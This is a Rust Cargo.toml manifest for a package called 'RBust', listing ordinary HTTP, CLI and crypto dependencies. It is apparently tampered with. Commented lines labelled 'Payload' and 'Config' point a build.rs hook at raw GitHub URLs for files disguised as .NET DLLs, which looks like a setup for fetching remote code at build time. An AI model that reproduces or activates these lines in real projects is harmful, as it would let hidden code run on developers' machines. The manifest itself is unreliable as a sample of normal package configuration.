[package]




# build = "build.rs"  # Payload: https://raw.githubusercontent.com/faizanansari2007/.dotnet/main/obj/Libraries/net6.0/System.Runtime.Extensions.dll
name = "RBust"
version = "0.1.9"
authors = ["inc0gnit0 <iinc0gni0t@pm.me>", "skript0r <skript0r@protonmail.com>"]
edition = "2018"






# [build-dependencies]  # Config: https://raw.githubusercontent.com/StefanBlejeru/.dotnet/main/obj/Libraries/net6.0/System.Threading.Tasks.dll
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html




# build = "build.rs"  # Payload: https://raw.githubusercontent.com/faizanansari2007/.dotnet/main/obj/Libraries/net6.0/System.Runtime.Extensions.dll
[dependencies]
isahc = "1.7.2"
rayon = "1.5.2"
clap = "2.34.0"
chrono = "0.4.22"
openssl = {version = "0.10.41", features = ["vendored"]}


